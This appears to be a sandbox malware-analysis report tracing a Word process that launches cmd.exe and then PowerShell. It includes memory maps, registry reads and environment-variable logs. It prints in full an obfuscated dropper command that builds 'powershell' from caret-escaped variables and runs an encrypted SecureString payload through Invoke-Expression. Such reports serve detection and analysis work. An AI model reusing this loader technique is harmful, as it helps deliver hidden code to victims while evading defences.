|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" uokQarPiXkRo TulEVCqHjGVGZiAowD qTzHstoNw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %XGUfViTjCEjwSVO%=ZHGHTLTuB&&set %DAXAIPvZQicL%=p&&set %vwiYoBzE%=o^w&&set %NwmclOIWlPPfrXs%=YtuPEnjH&&set %mESEbjHwWp%=!%DAXAIPvZQicL%!&&set %zkOiRaLmZdHljEQ%=XajFzihkNzuSY&&set %YJwaSiYTQtqK%=e^r&&set %pflmiDDErkSdkk%=!%vwiYoBzE%!&&set %fTvSPumjwc%=s&&set %iwaQfiAAaFLEdGO%=GdUcFsiGa&&set %iwpiikIEcScOE%=he&&set %zRBwSiVAaTKc%=ll&&!%mESEbjHwWp%!!%pflmiDDErkSdkk%!!%YJwaSiYTQtqK%!!%fTvSPumjwc%!!%iwpiikIEcScOE%!!%zRBwSiVAaTKc%! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIAYQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkADUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb48 |
| Parent PID | 0x968 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0009ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00597fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001b30000 | 0x01b30000 | 0x01e72fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01e80000 | 0x0214efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4acb0000 | 0x4ad08fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winbrand.dll | 0x7fef5e70000 | 0x7fef5e77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Threads
Thread 0xb4c
126
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-03-29 15:42:49 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 109980 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4acb0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76ce6d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76ce23d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76cd8290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76ce17e0 |
|
1 | |
| Environment | Get Environment String | name = XGUfViTjCEjwSVO |
|
1 | |
| Environment | Get Environment String | name = =ZHGHTLTuB&&set |
|
1 | |
| Environment | Get Environment String | name = DAXAIPvZQicL |
|
1 | |
| Environment | Get Environment String | name = =p&&set |
|
1 | |
| Environment | Get Environment String | name = vwiYoBzE |
|
1 | |
| Environment | Get Environment String | name = =o^w&&set |
|
1 | |
| Environment | Get Environment String | name = NwmclOIWlPPfrXs |
|
1 | |
| Environment | Get Environment String | name = =YtuPEnjH&&set |
|
1 | |
| Environment | Get Environment String | name = mESEbjHwWp |
|
1 | |
| Environment | Get Environment String | name = =! |
|
1 | |
| Environment | Get Environment String | name = DAXAIPvZQicL |
|
1 | |
| Environment | Get Environment String | name = !&&set |
|
1 | |
| Environment | Get Environment String | name = zkOiRaLmZdHljEQ |
|
1 | |
| Environment | Get Environment String | name = =XajFzihkNzuSY&&set |
|
1 | |
| Environment | Get Environment String | name = YJwaSiYTQtqK |
|
1 | |
| Environment | Get Environment String | name = =e^r&&set |
|
1 | |
| Environment | Get Environment String | name = pflmiDDErkSdkk |
|
1 | |
| Environment | Get Environment String | name = =! |
|
1 | |
| Environment | Get Environment String | name = vwiYoBzE |
|
1 | |
| Environment | Get Environment String | name = !&&set |
|
1 | |
| Environment | Get Environment String | name = fTvSPumjwc |
|
1 | |
| Environment | Get Environment String | name = =s&&set |
|
1 | |
| Environment | Get Environment String | name = iwaQfiAAaFLEdGO |
|
1 | |
| Environment | Get Environment String | name = =GdUcFsiGa&&set |
|
1 | |
| Environment | Get Environment String | name = iwpiikIEcScOE |
|
1 | |
| Environment | Get Environment String | name = =he&&set |
|
1 | |
| Environment | Get Environment String | name = zRBwSiVAaTKc |
|
1 | |
| Environment | Get Environment String | name = =ll&&! |
|
1 | |
| Environment | Get Environment String | name = mESEbjHwWp |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = pflmiDDErkSdkk |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = YJwaSiYTQtqK |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = fTvSPumjwc |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = iwpiikIEcScOE |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = zRBwSiVAaTKc |
|
1 | |
| Environment | Get Environment String | name = ! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl] |
|
1 | |
| Environment | Set Environment String | name = %XGUfViTjCEjwSVO%, value = ZHGHTLTuB |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %DAXAIPvZQicL%, value = p |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %vwiYoBzE%, value = ow |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %NwmclOIWlPPfrXs%, value = YtuPEnjH |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = %DAXAIPvZQicL%, result_out = p |
|
1 | |
| Environment | Set Environment String | name = %mESEbjHwWp%, value = p |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %zkOiRaLmZdHljEQ%, value = XajFzihkNzuSY |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %YJwaSiYTQtqK%, value = er |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = %vwiYoBzE%, result_out = ow |
|
1 | |
| Environment | Set Environment String | name = %pflmiDDErkSdkk%, value = ow |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %fTvSPumjwc%, value = s |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %iwaQfiAAaFLEdGO%, value = GdUcFsiGa |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %iwpiikIEcScOE%, value = he |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %zRBwSiVAaTKc%, value = ll |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = %mESEbjHwWp%, result_out = p |
|
1 | |
| Environment | Get Environment String | name = %pflmiDDErkSdkk%, result_out = ow |
|
1 | |
| Environment | Get Environment String | name = %YJwaSiYTQtqK%, result_out = er |
|
1 | |
| Environment | Get Environment String | name = %fTvSPumjwc%, result_out = s |
|
1 | |
| Environment | Get Environment String | name = %iwpiikIEcScOE%, result_out = he |
|
1 | |
| Environment | Get Environment String | name = %zRBwSiVAaTKc%, result_out = ll |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xb60, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #3: powershell.exe
873
328
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIA